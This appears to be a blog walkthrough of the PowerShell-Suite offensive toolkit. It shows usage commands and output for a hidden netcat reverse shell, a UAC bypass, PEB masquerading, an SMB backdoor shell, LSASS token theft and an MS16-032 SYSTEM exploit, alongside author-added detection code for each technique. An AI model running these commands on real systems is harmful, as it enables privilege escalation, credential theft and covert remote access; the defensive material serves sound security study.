The god-tier script collection: PowerShell-Suite
PowerShell-Suite is a GitHub project created by b33f that collects the current god-tier PowerShell attack scripts. I personally feel it is well worth walking everyone through how each script in it is used.
This post focuses on the scripts in the suite that call the Windows API.
Invoke-Runas is the functional equivalent of runas.exe on Windows; it calls Advapi32::CreateProcessWithLogonW.
Start cmd with a local account.
C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1
Start cmd with remote credentials. Equivalent to "/netonly" in runas.
C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2
Invoke-NetSessionEnum calls Netapi32::NetSessionEnum to enumerate the active sessions on a computer in the domain.
Enumerate active sessions on "SomeHostName".
C:\PS> Invoke-NetSessionEnum -HostName SomeHostName
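From the defender's side, the interesting question is who is allowed to call NetSessionEnum against a host in the first place. The following is an added example, not part of PowerShell-Suite: it reads the security descriptor that the Server service keeps for session information (the registry location used by the NetCease hardening approach, assumed here to be present with its default name) and reports whether Authenticated Users (S-1-5-11) still hold the right, which is what lets any domain user enumerate sessions.

```powershell
# Added example (not part of PowerShell-Suite): audit who may enumerate sessions
# on this host. Assumption: the self-relative security descriptor lives in the
# SrvsvcSessionInfo value under LanmanServer\DefaultSecurity, as documented for
# the NetCease hardening approach.
function Get-NetSessionEnumAccess {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
    $raw = (Get-ItemProperty -Path $key -Name SrvsvcSessionInfo -ErrorAction Stop).SrvsvcSessionInfo
    $sd  = [System.Security.AccessControl.RawSecurityDescriptor]::new([byte[]]$raw, 0)

    foreach ($ace in $sd.DiscretionaryAcl) {
        # Resolve the SID to a name where possible; fall back to the raw SID string
        $name = try {
            $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
        } catch { $ace.SecurityIdentifier.Value }
        [pscustomobject]@{
            Identity   = $name
            Sid        = $ace.SecurityIdentifier.Value
            AceType    = $ace.AceType
            AccessMask = ('0x{0:X}' -f $ace.AccessMask)
        }
    }
}

# True when Authenticated Users no longer have an allow ACE, i.e. session
# enumeration has been restricted to the remaining principals (normally admins).
function Test-NetSessionEnumHardened {
    $allowed = Get-NetSessionEnumAccess |
        Where-Object { $_.Sid -eq 'S-1-5-11' -and $_.AceType -eq 'AccessAllowed' }
    return (-not $allowed)
}

Get-NetSessionEnumAccess | Format-Table -AutoSize
"Hardened against anonymous/authenticated-user session enumeration: $(Test-NetSessionEnumHardened)"
```

Run this as an administrator on the file servers and domain controllers you care about; on an unhardened host the table will list Authenticated Users with an allow ACE, which is exactly the condition Invoke-NetSessionEnum relies on.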
Invoke-CreateProcess calls Kernel32::CreateProcess to give precise control over how a process is created.
Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1
Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
Detect-Debug uses several techniques to check whether a debugger is present.
Sample below is x64 Win8, WinDbg attached to PowerShell.
C:\PS> Detect-Debug
[+] Detect Kernel-Mode Debugging
[?] SystemKernelDebuggerInformation: False
[+] Detect User-Mode Debugging
[?] CloseHandle Exception: Detected
[?] IsDebuggerPresent: Detected
[?] CheckRemoteDebuggerPresent: Detected
[?] PEB!BeingDebugged: Detected
[?] PEB!NtGlobalFlag: Detected
[?] DebugSelf: Detected
Get-Handles calls NtQuerySystemInformation::SystemHandleInformation to retrieve the list of handles held by a given process.
Get handles for PID 2288
C:\PS> Get-Handles -ProcID 2288
[>] PID 2288 --> notepad
[+] Calling NtQuerySystemInformation::SystemHandleInformation
[?] Success, allocated 449300 byte result buffer
[>] Result buffer contains 28081 SystemHandleInformation objects
[>] PID 2288 has 71 handle objects
PID ObjectType HandleFlags Handle KernelPointer AccessMask
--- ---------- ----------- ------ ------------- ----------
2288 Directory NONE 0x0004 0x88E629F0 0x00000000
2288 File NONE 0x0008 0x84560C98 0x00100000
2288 File NONE 0x000C 0x846164F0 0x00100000
2288 Key NONE 0x0010 0xA3067A80 0x00020000
2288 ALPC Port NONE 0x0014 0x8480C810 0x001F0000
2288 Mutant NONE 0x0018 0x8591FEB8 0x001F0000
2288 Key NONE 0x001C 0x96719C48 0x00020000
2288 Event NONE 0x0020 0x850C6838 0x001F0000
...Snip...
Get-TokenPrivs opens a handle to the process and calls Advapi32::GetTokenInformation to list the privileges associated with the process's token.
Get token privileges for PID 3836
C:\PS> Get-TokenPrivs -ProcID 3836
[?] PID 3836 --> calc
[+] Process handle: 1428
[+] Token handle: 1028
[+] Token has 5 privileges:
LUID Privilege
---- ---------
19 SeShutdownPrivilege
23 SeChangeNotifyPrivilege
25 SeUndockPrivilege
33 SeIncreaseWorkingSetPrivilege
34 SeTimeZonePrivilege
Get-Exports retrieves a DLL's exports and can optionally emit C++ wrapper output. It reads the DLL into memory and parses the image itself rather than loading it, so both 32-bit and 64-bit DLLs can be processed regardless of PowerShell's bitness.
PS C:\> Get-Exports -DllPath C:\Windows\System32\ubpm.dll
[?] 32-bit Image!
[>] Time Stamp: 07/15/2016 18:07:55
[>] Function Count: 16
[>] Named Functions: 16
[>] Ordinal Base: 1
[>] Function Array RVA: 0x2F578
[>] Name Array RVA: 0x2F5B8
[>] Ordinal Array RVA: 0x2F5F8
Ordinal ImageRVA FunctionName
------- -------- ------------
1 0x000242A0 UbpmAcquireJobBackgroundMode
2 0x00004750 UbpmApiBufferFree
3 0x00004E30 UbpmCloseTriggerConsumer
4 0x000135E0 UbpmInitialize
5 0x00008D00 UbpmOpenTriggerConsumer
6 0x000242C0 UbpmReleaseJobBackgroundMode
7 0x00013230 UbpmSessionStateChanged
8 0x000242E0 UbpmTerminate
9 0x00003BD0 UbpmTriggerConsumerConfigure
10 0x000040C0 UbpmTriggerConsumerControl
11 0x00025B10 UbpmTriggerConsumerControlNotifications
12 0x00025B40 UbpmTriggerConsumerQueryStatus
13 0x0000E1B0 UbpmTriggerConsumerRegister
14 0x000043F0 UbpmTriggerConsumerSetDisabledForUser
15 0x00012480 UbpmTriggerConsumerSetStatePublishingSecurity
16 0x00005330 UbpmTriggerConsumerUnregister
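To make the "parse the file, don't load it" idea concrete, here is an added example (my own code, not Get-Exports or any other part of PowerShell-Suite) that walks the DOS header, the PE/optional header and the section table to locate the export directory, then lists ordinal, RVA and name for every named export. Because it never maps the DLL, a 32-bit PowerShell host can read a 64-bit DLL and vice versa; it also reports forwarded exports, which Get-Exports' output above does not distinguish. The function name and the output column names are mine.

```powershell
# Added example (not part of PowerShell-Suite): static export-table parser.
function Get-PeExports {
    param([Parameter(Mandatory)][string]$Path)

    $b   = [System.IO.File]::ReadAllBytes($Path)
    $u16 = { param($o) [BitConverter]::ToUInt16($b, $o) }
    $u32 = { param($o) [BitConverter]::ToUInt32($b, $o) }

    if ((& $u16 0) -ne 0x5A4D) { throw "Not an MZ image: $Path" }
    $pe = & $u32 0x3C                                   # e_lfanew -> IMAGE_NT_HEADERS
    if ((& $u32 $pe) -ne 0x4550) { throw "Missing PE signature: $Path" }

    $numSections = & $u16 ($pe + 6)                     # IMAGE_FILE_HEADER.NumberOfSections
    $optSize     = & $u16 ($pe + 20)                    # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    $opt         = $pe + 24                             # IMAGE_OPTIONAL_HEADER
    $magic       = & $u16 $opt
    $is64        = ($magic -eq 0x20B)                   # PE32+ vs PE32 (0x10B)
    if (-not $is64 -and $magic -ne 0x10B) { throw "Unknown optional header magic 0x$($magic.ToString('X'))" }

    # DataDirectory[0] is the export directory; its offset differs between PE32 and PE32+
    $dirOff  = if ($is64) { $opt + 112 } else { $opt + 96 }
    $expRva  = & $u32 $dirOff
    $expSize = & $u32 ($dirOff + 4)
    if ($expRva -eq 0) { return @() }                   # image exports nothing

    # Section table (40-byte IMAGE_SECTION_HEADERs) follows the optional header
    $secBase  = $opt + $optSize
    $sections = for ($i = 0; $i -lt $numSections; $i++) {
        $s = $secBase + 40 * $i
        [pscustomobject]@{
            VirtualSize    = & $u32 ($s + 8)
            VirtualAddress = & $u32 ($s + 12)
            RawSize        = & $u32 ($s + 16)
            RawPointer     = & $u32 ($s + 20)
        }
    }
    # Translate an RVA to a file offset using the section that contains it
    $toOff = {
        param([uint32]$rva)
        foreach ($s in $sections) {
            $len = [Math]::Max($s.VirtualSize, $s.RawSize)
            if ($rva -ge $s.VirtualAddress -and $rva -lt ($s.VirtualAddress + $len)) {
                return $s.RawPointer + ($rva - $s.VirtualAddress)
            }
        }
        throw "RVA 0x$($rva.ToString('X')) is not backed by any section"
    }

    $e        = & $toOff $expRva                        # IMAGE_EXPORT_DIRECTORY
    $ordBase  = & $u32 ($e + 16)
    $numNames = & $u32 ($e + 24)
    $funcTab  = & $toOff (& $u32 ($e + 28))             # AddressOfFunctions
    $nameTab  = & $toOff (& $u32 ($e + 32))             # AddressOfNames
    $ordTab   = & $toOff (& $u32 ($e + 36))             # AddressOfNameOrdinals

    for ($i = 0; $i -lt $numNames; $i++) {
        $nameOff = & $toOff (& $u32 ($nameTab + 4 * $i))
        $end     = [Array]::IndexOf($b, [byte]0, [int]$nameOff)
        $name    = [System.Text.Encoding]::ASCII.GetString($b, $nameOff, $end - $nameOff)
        $idx     = & $u16 ($ordTab + 2 * $i)            # index into AddressOfFunctions
        $rva     = & $u32 ($funcTab + 4 * $idx)
        # An RVA that points back into the export directory is a forwarder string, not code
        $fwd = if ($rva -ge $expRva -and $rva -lt ($expRva + $expSize)) {
            $fo = & $toOff $rva
            $fe = [Array]::IndexOf($b, [byte]0, [int]$fo)
            [System.Text.Encoding]::ASCII.GetString($b, $fo, $fe - $fo)
        }
        [pscustomobject]@{
            Ordinal      = $ordBase + $idx
            ImageRVA     = ('0x{0:X8}' -f $rva)
            FunctionName = $name
            ForwardedTo  = $fwd
            Bitness      = if ($is64) { 64 } else { 32 }
        }
    }
}

Get-PeExports -Path C:\Windows\System32\ubpm.dll | Format-Table Ordinal, ImageRVA, FunctionName, ForwardedTo -AutoSize
```

Exports that are reachable only by ordinal (no name entry) are deliberately not listed here, since the point is the name/RVA mapping shown above; extending the loop over NumberOfFunctions instead of NumberOfNames would add them.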
Bypass-UAC provides a framework for UAC bypasses that achieves automatic elevation through the methods exposed by the IFileOperation COM object. This is not a new technique: previously, UAC could be bypassed by injecting a DLL into the "explorer.exe" process. That approach is not the most effective, however, because injecting a DLL into explorer is quite likely to trigger the system's security alerts. Moreover, relying on such a fixed, uncontrollable DLL to bypass UAC greatly reduces operational flexibility.
C:\PS> Bypass-UAC -Method ucmDismMethod
[!] Impersonating explorer.exe!
[+] PebBaseAddress: 0x000007F73E93F000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x000000569B5F1780
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x000000569B5F1790
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x000000569B5F2208
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x000000569B5F2218
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
[>] Dropping proxy dll..
[+] 64-bit Yamabiko: C:\Users\b33f\AppData\Local\Temp\yam1730961377.tmp
[>] Creating XML trigger: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
[>] Performing elevated IFileOperation::MoveItem operation..
[?] Executing PkgMgr..
[!] UAC artifact: C:\Windows\System32\dismcore.dll
[!] UAC artifact: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
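The two "UAC artifact" lines at the end of that run are the on-disk evidence this method leaves behind, and they are what a defender should look for. The following is an added example, not part of PowerShell-Suite: it checks whether a dismcore.dll is sitting directly in System32 (the genuine DISM core library lives in the System32\Dism subdirectory, so a copy one level up is suspicious), reports its Authenticode status, and lists leftover trigger files in the current user's Temp directory matching the pac*.xml naming seen in the output above. The function name is mine and the filename pattern is taken only from this page's output.

```powershell
# Added example (not part of PowerShell-Suite): look for the artifacts of the
# ucmDismMethod run shown above.
function Test-DismHijackArtifacts {
    $sys32     = Join-Path $env:SystemRoot 'System32'
    $candidate = Join-Path $sys32 'dismcore.dll'       # hijack location, not System32\Dism
    $genuine   = Join-Path $sys32 'Dism\dismcore.dll'  # where the real library lives

    $result = [ordered]@{
        HijackDllPresent  = Test-Path -LiteralPath $candidate
        HijackDllStatus   = $null
        HijackDllSigner   = $null
        GenuineDllPresent = Test-Path -LiteralPath $genuine
        LeftoverTriggers  = @()
    }

    if ($result.HijackDllPresent) {
        # An unsigned or differently-signed dismcore.dll directly in System32 is a strong indicator
        $sig = Get-AuthenticodeSignature -FilePath $candidate
        $result.HijackDllStatus = $sig.Status
        $result.HijackDllSigner = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { 'none' }
    }

    # Pattern derived from the filenames in the run above (pac<digits>.xml in %TEMP%)
    $result.LeftoverTriggers = @(Get-ChildItem -Path $env:TEMP -Filter 'pac*.xml' -File -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty FullName)

    [pscustomobject]$result
}

Test-DismHijackArtifacts | Format-List
```

Because the DLL is dropped into System32 by an elevated IFileOperation, the file itself may carry a normal system-owned ACL; the signature status and the mere presence of the file outside System32\Dism are the reliable signals, not ownership.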
Masquerade-PEB can make use of the PSReflect component. The function rewrites the PowerShell process's PEB structure so that the process masquerades as "explorer.exe".
C:\PS> Masquerade-PEB -BinPath C:\Windows\System32\notepad.exe
[?] PID 2756
[+] PebBaseAddress: 0x7FFD3000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x002F11F8
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x002F1200
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x002F1B74
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x002F1B7C
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
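Everything Masquerade-PEB overwrites lives in user mode, so the kernel's own record of the process image is untouched. The following is an added example (my own code, not part of PowerShell-Suite) that uses that gap for detection. It assumes, as I understand the implementations, that .NET's Process.MainModule.FileName is obtained through PSAPI's GetModuleFileNameEx, which reads the target's PEB loader list (the same list the output above shows being rewritten), whereas QueryFullProcessImageNameW is answered by the kernel. A process where the two disagree is a PEB-tampering candidate. The P/Invoke namespace and the function names are mine.

```powershell
# Added example (not part of PowerShell-Suite): compare the PEB-reported image
# path with the kernel-reported one for every process we can open.
Add-Type -Namespace PebCheck -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool QueryFullProcessImageNameW(IntPtr hProcess, uint flags, System.Text.StringBuilder name, ref uint size);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr h);
'@

# Kernel view of the image path; returns $null when the process cannot be opened
function Get-KernelImagePath {
    param([Parameter(Mandatory)][int]$ProcessId)
    $PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
    $h = [PebCheck.Native]::OpenProcess($PROCESS_QUERY_LIMITED_INFORMATION, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) { return $null }
    try {
        $sb = New-Object System.Text.StringBuilder 1024
        [uint32]$len = $sb.Capacity
        if ([PebCheck.Native]::QueryFullProcessImageNameW($h, 0, $sb, [ref]$len)) {
            return $sb.ToString(0, [int]$len)
        }
        return $null
    } finally {
        [void][PebCheck.Native]::CloseHandle($h)
    }
}

# Emit one record per process whose PEB-derived path differs from the kernel's
function Find-PebMismatch {
    foreach ($p in Get-Process) {
        $kernelPath = Get-KernelImagePath -ProcessId $p.Id
        if (-not $kernelPath) { continue }                      # protected process or no access
        try { $pebPath = $p.MainModule.FileName } catch { continue }   # cross-bitness or access denied
        if ($pebPath -and ($pebPath -ne $kernelPath)) {         # -ne is case-insensitive here
            [pscustomobject]@{
                PID        = $p.Id
                KernelPath = $kernelPath
                PebPath    = $pebPath
            }
        }
    }
}

Find-PebMismatch | Format-Table -AutoSize
```

Run it from an elevated 64-bit PowerShell so that most processes can be opened. Expect occasional benign mismatches where a process was launched through a short (8.3) path or a directory junction; those differ in spelling but resolve to the same file, whereas a masqueraded PowerShell process will show powershell.exe on the kernel side and an entirely different binary on the PEB side.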
Invoke-SMBShell is an interactive shell that communicates over the SMB protocol.
Server:
PS C:\> Invoke-SMBShell
+-------
| Host Name: 0AK
| Named Pipe: tapsrv.5604.yk0DxXvjUD9xwyJ9
| AES Key: q6EKfuJTX93YUnmX
+-------
[>] Waiting for client..
SMB shell: whoami
0ak\b33f
SMB shell: IdontExist
The term 'IdontExist' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
SMB shell: $PSVersionTable
Name Value
---- -----
PSRemotingProtocolVersion 2.2
BuildVersion 6.2.9200.17065
PSCompatibleVersions {1.0, 2.0, 3.0}
PSVersion 3.0
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
SerializationVersion 1.1.0.1
SMB shell: leave
[!] Client disconnecting..
[>] Waiting for client..
SMB shell: calc
Job SMBJob-dVkIkAkXINjMe09S completed successfully!
SMB shell: exit
[!] Client disconnecting..
[!] Terminating server..
PS C:\>
Client:
# Client disconnected because of "leave" command
PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
# Client disconnected because "exit" command kills client/server
PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
Conjure-LSASS uses SeDebugPrivilege to duplicate the LSASS access token and then impersonates it on the calling thread. If SeDebugPrivilege is disabled, we can re-enable it.
Conjure LSASS into our midst!
C:\PS> Conjure-LSASS
[?] SeDebugPrivilege is available!
[+] Current process handle: 852
[>] Calling Advapi32::OpenProcessToken
[+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: 2000
[?] SeDebugPrivilege is enabled!
[>] Calling Advapi32::OpenProcessToken --> LSASS
[+] Token handle with TOKEN_IMPERSONATE|TOKEN_DUPLICATE: 1512
[>] Calling Advapi32::DuplicateToken --> LSASS
[+] Duplicate token handle with SecurityImpersonation level: 2008
[>] Calling Advapi32::SetThreadToken
[+] Knock knock .. who's there .. LSASS
[+] User context: SYSTEM
C:\PS> whoami
ERROR: Access is denied.
ERROR: Access is denied.
C:\PS> Get-ChildItem -Path hklm:SAM
Hive: HKEY_LOCAL_MACHINE\SAM
SKC VC Name Property
--- -- ---- --------
3 2 SAM {C, ServerDomainUpdates}
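Token theft from LSASS, as in the run above, starts with a handle to lsass.exe, and that handle open is something Sysmon records as Event ID 10 (ProcessAccess). The following is an added example (my own code, not part of PowerShell-Suite) that parses those events, decodes the GrantedAccess mask into PROCESS_* rights, and surfaces every process that touched LSASS. It assumes Sysmon is installed with ProcessAccess logging enabled and uses Sysmon's documented field names; the sample event at the bottom is constructed so the parser can be exercised without a Sysmon log, and the function names are mine.

```powershell
# Added example (not part of PowerShell-Suite): hunt LSASS handle opens via Sysmon EID 10.

# Decode a PROCESS_* access mask into flag names (standard Win32 constants)
function Expand-ProcessAccessMask {
    param([Parameter(Mandatory)][int]$Mask)
    $bits = [ordered]@{
        0x0001 = 'TERMINATE';       0x0002 = 'CREATE_THREAD';  0x0008 = 'VM_OPERATION'
        0x0010 = 'VM_READ';         0x0020 = 'VM_WRITE';       0x0040 = 'DUP_HANDLE'
        0x0080 = 'CREATE_PROCESS';  0x0100 = 'SET_QUOTA';      0x0200 = 'SET_INFORMATION'
        0x0400 = 'QUERY_INFORMATION'; 0x0800 = 'SUSPEND_RESUME'; 0x1000 = 'QUERY_LIMITED_INFORMATION'
    }
    foreach ($k in $bits.Keys) { if ($Mask -band $k) { $bits[$k] } }
}

# Turn one Sysmon ProcessAccess event (as XML text) into a flat record
function ConvertFrom-SysmonProcessAccess {
    param([Parameter(Mandatory)][string]$EventXml, [datetime]$Time = [datetime]::MinValue)
    $x = [xml]$EventXml
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $mask = [Convert]::ToInt32($d.GrantedAccess, 16)      # "0x1400" style string
    [pscustomobject]@{
        Time          = $Time
        SourceImage   = $d.SourceImage
        SourcePID     = $d.SourceProcessId
        TargetImage   = $d.TargetImage
        GrantedAccess = $d.GrantedAccess
        Rights        = ((Expand-ProcessAccessMask $mask) -join '|')
        CallTrace     = $d.CallTrace
    }
}

# Live hunt: every recorded handle open against lsass.exe
function Get-LsassAccessEvents {
    param([int]$MaxEvents = 1000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object { ConvertFrom-SysmonProcessAccess -EventXml $_.ToXml() -Time $_.TimeCreated } |
        Where-Object { $_.TargetImage -like '*\lsass.exe' }
}

# Constructed sample event (not a real log entry) so the parser can be tried offline
$sampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>10</EventID></System>
  <EventData>
    <Data Name="RuleName">-</Data>
    <Data Name="SourceProcessId">4242</Data>
    <Data Name="SourceImage">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="TargetProcessId">640</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1400</Data>
    <Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c1fe</Data>
  </EventData>
</Event>
'@
ConvertFrom-SysmonProcessAccess -EventXml $sampleEvent | Format-List
```

The decoded Rights column matters more than the raw number: OpenProcessToken needs only PROCESS_QUERY_INFORMATION or PROCESS_QUERY_LIMITED_INFORMATION on LSASS, so a token-duplication approach like the one above never asks for VM_READ. A hunt that keys solely on memory-read rights (the credential-dumping pattern) will miss it; flag any non-system SourceImage, in particular script hosts, that opens lsass.exe at all.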
Invoke-MS16-032 is the PowerShell exploit for MS16-032, a Windows local privilege-escalation vulnerability. Everyone knows this one, so no explanation needed.
Targets:
Win7-Win10 & 2k8-2k12 <== 32/64 bit!
Tested on x32 Win7, x64 Win8, x64 2k12R2
Sit back and watch the pwn!
C:\PS> Invoke-MS16-032
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 956
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 964
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
Subvert-PE injects shellcode into a PE image.
Analyse the PE header and hexdump the region of memory where shellcode would be injected.
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe
Same as above but continue to inject shellcode and overwrite the binary.
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
Trace-Execution uses the Capstone engine to recursively disassemble a PE (x32/x64) from its entry point. Because the disassembly is static, both x32 and x64 PEs can be disassembled regardless of PowerShell's bitness.
PS C:\> Trace-Execution -Path .\Desktop\some.exe -InstructionCount 10
[>] 32-bit Image!
[?] Call table:
Address Mnemonic Taken Reason
------- -------- ----- ------
0x4AD0829A call Yes Relative offset call
0x4AD07CB7 call No Indirect call
[?] Instruction trace:
Size Address Mnemonic Operands Bytes RegRead RegWrite
---- ------- -------- -------- ----- ------- --------
5 0x4AD0829A call 0x4ad07c89 {232, 234, 249, 255...} {esp}
2 0x4AD07C89 mov edi, edi {139, 255, 249, 255...}
1 0x4AD07C8B push ebp {85, 255, 249, 255...} {esp} {esp}
2 0x4AD07C8C mov ebp, esp {139, 236, 249, 255...}
3 0x4AD07C8E sub esp, 0x10 {131, 236, 16, 255...} {eflags}
5 0x4AD07C91 mov eax, dword ptr [0x4ad240ac] {161, 172, 64, 210...}
4 0x4AD07C96 and dword ptr [ebp - 8], 0 {131, 101, 248, 0...} {eflags}
4 0x4AD07C9A and dword ptr [ebp - 4], 0 {131, 101, 252, 0...} {eflags}
1 0x4AD07C9E push ebx {83, 101, 252, 0...} {esp} {esp}
1 0x4AD07C9F push edi {87, 101, 252, 0...} {esp} {esp}
5 0x4AD07CA0 mov edi, 0xbb40e64e {191, 78, 230, 64...}
5 0x4AD07CA5 mov ebx, 0xffff0000 {187, 0, 0, 255...}
2 0x4AD07CAA cmp eax, edi {59, 199, 0, 255...} {eflags}
6 0x4AD07CAC jne 0x4ad1bc8c {15, 133, 218, 63...} {eflags}
1 0x4AD07CB2 push esi {86, 133, 218, 63...} {esp} {esp}
3 0x4AD07CB3 lea eax, dword ptr [ebp - 8] {141, 69, 248, 63...}
1 0x4AD07CB6 push eax {80, 69, 248, 63...} {esp} {esp}
6 0x4AD07CB7 call dword ptr [0x4ad01150] {255, 21, 80, 17...} {esp}
3 0x4AD07CBD mov esi, dword ptr [ebp - 4] {139, 117, 252, 0...}
3 0x4AD07CC0 xor esi, dword ptr [ebp - 8] {51, 117, 248, 0...} {eflags}